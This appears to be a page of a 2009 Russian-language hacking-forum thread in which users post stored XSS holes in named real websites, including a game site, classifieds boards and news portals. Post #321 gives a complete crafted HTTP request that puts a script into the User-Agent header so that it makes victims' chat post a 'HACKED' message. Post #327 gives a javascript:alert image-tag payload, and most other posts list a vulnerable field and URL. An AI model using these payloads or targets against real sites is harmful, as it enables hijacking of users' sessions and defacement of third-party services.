ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 33 из 41 « Первая < 23 29 30 31 32 33 34 35 36 37 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 27.01.2009, 20:48
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
Провел на форуме:
1449774

Репутация: 127
Отправить сообщение для TR0J@N с помощью ICQ
По умолчанию
Активная XSS в NeverLands.ru
Вообщем давно обнаружил, ну думаю выложу)
Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно!

Пример использования:

Код:
POST http://www.neverlands.ru/game.php HTTP/1.0
Accept: */*
Referer: http://www.neverlands.ru/index.cgi
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: <script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>
Host: www.neverlands.ru
Content-Length: 58
Pragma: no-cache
Cookie: watermark=МЕТКО

player_nick=ЛОГИН&player_password=ПАСС&x=1&y=1
Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим

Код:
ЛОГИН: HACKED_BY_TROJAN_
P.S. На момент публикации всё работает!

27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён")

TROJAN (с)
 
Ответить с цитированием

  #322  
Старый 11.02.2009, 22:02
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию
И вновь i.ua

Сервис "Объявления" - board.i.ua
При заполнении формы уязвимо поле "Название товара"

Цитата:
http://board.i.ua/user/1435442/
 
Ответить с цитированием

  #323  
Старый 13.02.2009, 07:17
lastsmile
Познающий
Регистрация: 22.09.2007
Сообщений: 42
Провел на форуме:
255505

Репутация: 22
По умолчанию
активная XSS на сайте Эльдорадо www.eldorado.ru (http://eldorado.com.ua/)
регистрируемся на форуме
уязвимо поле ИМЯ
 
Ответить с цитированием

  #324  
Старый 18.02.2009, 14:33
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию
A.UA
В письме уязвимо поле "Тема".
 
Ответить с цитированием

Xss на http://jetswap.com/
  #325  
Старый 19.03.2009, 14:10
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
Post Xss на http://jetswap.com/
PHP код:
http://go.jetswap.com/support 
Уязвимое поле тема.
Минус только один в течении примерно 10 часов служба поддержки обрабатывает ваш запрос и удаляет его.
З.Ы. У админов и службы поддержки скрипт не обрабатывается.
 
Ответить с цитированием

  #326  
Старый 20.03.2009, 18:07
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Код:
http://autoportal.od.ua/?a=forum&p=1
Уязвивмы все поля.
 
Ответить с цитированием

  #327  
Старый 24.03.2009, 17:05
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
По умолчанию
PHP код:
demotivation.ru
Уязвимо поле коментария 
<IMG SRC="javascript:alert('XSS');"
http://demotivation.ru/0ixq1u1biut9pic.html
Пример
 
Ответить с цитированием

  #328  
Старый 24.03.2009, 18:28
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
http://voiska.ru
PHP код:
уязвимое поле :название новости
http://voiska.ru/index.php?ind=news&op=news_show_category&idc=2 
 
Ответить с цитированием

  #329  
Старый 25.03.2009, 13:10
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
www.tiensmed.ru
Код:
уязвимое: название новости
http://www.tiensmed.ru/news/upcoming/
 
Ответить с цитированием

  #330  
Старый 26.03.2009, 14:12
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
http://www.chef.com.ua
Код:
уязвимое поле:коментарии
http://www.chef.com.ua/articles/588.html#comments
 
Ответить с цитированием
Ответ
Страница 33 из 41 « Первая < 23 29 30 31 32 33 34 35 36 37 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ